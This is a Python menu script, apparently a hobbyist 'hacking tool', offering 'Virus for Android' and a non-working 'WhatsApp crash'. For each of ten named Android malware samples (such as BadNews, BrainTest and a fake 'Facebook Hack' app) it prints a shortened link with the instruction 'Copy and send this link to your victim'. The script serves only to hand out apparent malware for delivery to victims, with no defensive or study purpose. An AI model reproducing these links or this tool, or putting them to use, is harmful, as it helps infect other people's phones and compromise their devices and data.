#!/usr/bin/python
# Anon4You
# Author : Bishal Singh
# YouTube : Alienkrishn
import random, sys, os.path, time, itertools, threading
def doud(s):
    for alien in s + '\n':
        sys.stdout.write(alien)
        sys.stdout.flush()
        time.sleep(0.001)

a="""
\a\a\33[1;31m
▞▀▖     ▌
▙▄▌▛▀▖▞▀▌▙▀▖▞▀▖▌ ▌▄ ▙▀▖▌ ▌▞▀▘
▌ ▌▌ ▌▌ ▌▌  ▌ ▌▐▐ ▐ ▌  ▌ ▌▝▀▖
▘ ▘▘ ▘▝▀▘▘  ▝▀  ▘ ▀▘▘  ▝▀▘▀▀ © Alienkrishn

\033[1;31m[\033[1;32m1\033[1;31m]\033[1;37m Virus for Android
\033[1;31m[\033[1;32m2\033[1;31m]\033[1;37m WhatsApp crash
\033[1;31m[\033[1;32m3\033[1;31m]\033[1;37m About us
\033[1;31m[\033[1;32m0\033[1;31m]\033[1;37m Exit
"""
b="""
\a\a\33[1;32m
▞▀▖     ▌         ▗
▙▄▌▛▀▖▞▀▌▙▀▖▞▀▖▌ ▌▄ ▙▀▖▌ ▌▞▀▘
▌ ▌▌ ▌▌ ▌▌  ▌ ▌▐▐ ▐ ▌  ▌ ▌▝▀▖
▘ ▘▘ ▘▝▀▘▘  ▝▀  ▘ ▀▘▘  ▝▀▘▀▀ © Alienkrishn

\033[1;31m[\033[1;32m1\033[1;31m]\033[1;37m Virus for Android
\033[1;31m[\033[1;32m2\033[1;31m]\033[1;37m WhatsApp crash
\033[1;31m[\033[1;32m3\033[1;31m]\033[1;37m About us
\033[1;31m[\033[1;32m0\033[1;31m]\033[1;37m Exit
"""
c="""
\a\a\33[1;33m
▞▀▖     ▌         ▗
▙▄▌▛▀▖▞▀▌▙▀▖▞▀▖▌ ▌▄ ▙▀▖▌ ▌▞▀▘
▌ ▌▌ ▌▌ ▌▌  ▌ ▌▐▐ ▐ ▌  ▌ ▌▝▀▖
▘ ▘▘ ▘▝▀▘▘  ▝▀  ▘ ▀▘▘  ▝▀▘▀▀ © Alienkrishn

\033[1;31m[\033[1;32m1\033[1;31m]\033[1;37m Virus for Android
\033[1;31m[\033[1;32m2\033[1;31m]\033[1;37m WhatsApp crash
\033[1;31m[\033[1;32m3\033[1;31m]\033[1;37m About us
\033[1;31m[\033[1;32m0\033[1;31m]\033[1;37m Exit
"""

d="""
\a\a\33[1;34m
▞▀▖     ▌         ▗
▙▄▌▛▀▖▞▀▌▙▀▖▞▀▖▌ ▌▄ ▙▀▖▌ ▌▞▀▘
▌ ▌▌ ▌▌ ▌▌  ▌ ▌▐▐ ▐ ▌  ▌ ▌▝▀▖
▘ ▘▘ ▘▝▀▘▘  ▝▀  ▘ ▀▘▘  ▝▀▘▀▀ © Alienkrishn

\033[1;31m[\033[1;32m1\033[1;31m]\033[1;37m Virus for Android
\033[1;31m[\033[1;32m2\033[1;31m]\033[1;37m WhatsApp crash
\033[1;31m[\033[1;32m3\033[1;31m]\033[1;37m About us
\033[1;31m[\033[1;32m0\033[1;31m]\033[1;37m Exit
"""
z="""\a\33[31;1m
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|W|h|a|t|s|A|p|p|-|C|r|a|s|h|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

"""

def andro():
  print("""\a\n\n\33[31;1mUse it at your own risk I'm not 
responsible for any kind of missuse of this tool
\33[0m
 [01] Agent
 [02] AndroidFramework
 [03] ArtStation
 [04] BadNews
 [05] BrainTest
 [06] Facebook Hack
 [07] IWinOnline
 [08] Minecraft2 Mod
 [09] MusicPlayer
 [10] Settings
 [00] Exit
 """)
  xx=input("Virus For Android: ")
  if xx=='1' or xx=='01':
    print("Genarating link")
    time.sleep(2)
    print("Copy and send this link to your victim\n")
    print("\33[34mLink:- https://cutt.ly/LNMZQT9")
  elif xx=='2' or xx=='02':
    print("Genarating link")
    time.sleep(2)
    print("Copy and send this link to your victim\n")
    print("\33[34mLink:- https://cutt.ly/6NMXehG")
  elif xx=='3' or xx=='03':
    print("Genarating link")
    time.sleep(2)
    print("Copy and send this link to your victim\n")
    print("\33[34mLink:- https://cutt.ly/9NMXUgH")
  elif xx=='4' or xx=='04':
    print("Genarating link")
    time.sleep(2)
    print("Copy and send this link to your victim\n")
    print("\33[34mLink:- https://cutt.ly/ANMX6OR")
  elif xx=='5' or xx=='05':
    print("Genarating link")
    time.sleep(2)
    print("Copy and send this link to your victim\n")
    print("\33[34mLink:- https://cutt.ly/hNMC9W4")
  elif xx=='6' or xx=='06':
    print("Genarating link")
    time.sleep(2)
    print("Copy and send this link to your victim\n")
    print("\33[34mLink:- https://cutt.ly/WNMVQW0")
  elif xx=='7' or xx=='07':
    print("Genarating link")
    time.sleep(2)
    print("Copy and send this link to your victim\n")
    print("\33[34mLink:- https://cutt.ly/eNMBKfQ")
  elif xx=='8' or xx=='08':
    print("Genarating link")
    time.sleep(2)
    print("Copy and send this link to your victim\n")
    print("\33[34mLink:- https://cutt.ly/dNMNwGs")
  elif xx=='9' or xx=='09':
    print("Genarating link")
    time.sleep(2)
    print("Copy and send this link to your victim\n")
    print("\33[34mLink:- https://cutt.ly/UNMNE3K")
  elif xx=='10':
    print("Genarating link")
    time.sleep(2)
    print("Copy and send this link to your victim\n")
    print("\33[34mLink:- https://cutt.ly/8NMMtgK")
  elif xx=='0' or xx=='00':
    print("Thanks for using this tool")
    time.sleep(2)
    sys.exit(0)
  else:
    print ("\a\n\033[1;34m[x] \033[1;31mERROR:\033[0;00m sorry wrong input...")
    os.system("androvirus")

stop = False

def muter():

    for c in itertools.cycle(['- ','\ ','| ','/ ']):
        if stop:
            break
        sys.stdout.write("\r\033[1;32m[+]\033[1;31m Exiting\033[1;37m....." + c)
        sys.stdout.flush()
        time.sleep(0.04)
    sys.stdout.write("\r\033[1;32m[+] \033[1;35mThanks for using this tool, Byeee ...\n")
t = threading.Thread(target=muter)

def alien4you():
    anon = [a,b,c,d]
    m = "".join(random.sample(anon,1))
    os.system("clear")
    doud(m)
alien4you()

k = input("\033[1;32m[*]\033[1;31m Choose\033[1;32m :\033[1;36m")

if k == '0' or k == '00':
  t.start()
  time.sleep(1)
  stop = True
  os.system("cd")
  sys.exit(0)
elif k == '1':
  andro()
elif k == '3':
  os.system("xdg-open https://github.com/Anon4You")
elif k == '2':
  print(z)
  print("\33[0mWhatsApp crash is not working now I will update it soon subscribe my youtube channel for upcoming update")
  time.sleep(4)
  os.system("xdg-open https://youtube.com/@alienkrishn")
else:
  print("\a\n\033[1;34m[x] \033[1;31mERROR:\033[0;00m sorry wrong input...")
  time.sleep(2)
  os.system("androvirus")
